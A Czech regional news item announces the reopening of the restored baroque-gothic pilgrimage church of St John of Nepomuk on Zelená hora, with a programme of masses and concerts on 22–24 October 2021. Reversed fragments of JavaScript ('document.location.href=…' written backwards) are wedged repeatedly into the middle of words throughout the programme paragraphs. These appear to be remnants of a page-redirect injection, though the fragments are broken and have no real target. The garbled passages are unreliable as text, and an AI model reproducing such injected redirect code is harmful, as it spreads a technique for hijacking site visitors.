Rainbow page separator

Kostelu obnovenému do původního vzhledu bude opět požehnáno

Středa, 20. října 2021

Žďár nad Sázavou / Po tři sta letech se opět „otevře“ poutní kostel svatého Jana Nepomuckého na Zelené hoře. Památku UNESCO v podobě díla stavitele Jana Blažeje Santiniho Aichla z let 1719-1722 ve stylu takzvané barokní gotiky čeká slavnostní znovuotevření po rozsáhlé rekonstrukci, která trvala několik let, aby kostel znovu vypadal jako v době svého vzniku. V další fázi obnovy přijde na řadu rekonstrukce ambitu.
Slavnosti jsou rozděleny do tří dní a několika kulturních a duchovních akcí – od pátku 22. do neděle 24. října – a mimo prohlídky zrestaurovaného kostela se návštěvníci mohou zúčastnit bohoslužby či hudebních vys[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupení. V sobotu 23. října bude obnovenému poutnímu kostelu znovu požehnáno, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to v rámci mše svaté celebrované od půl páté odpoledne pomocným biskupem brněnským a generálním vikářem brněnské diecéze Pavlem Konzbulem. Liturgii hudebně doprovodí Horácká muzika. Poté se mohou zájemci seznámit s rozsahem provedených rekonstrukčních prací a jejich průběhem.
V neděli 24. října se od půl čtvrté odpoledne uskuteční otevření sva[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostánku pro veřejnost společně s koncertem sboru Can[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to Nepomucenum z Nepomuku. Od 18 hodin bude pak pro posluchače připraveno hudební vys[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupení mužského sboru Vocatus Ecumenicus.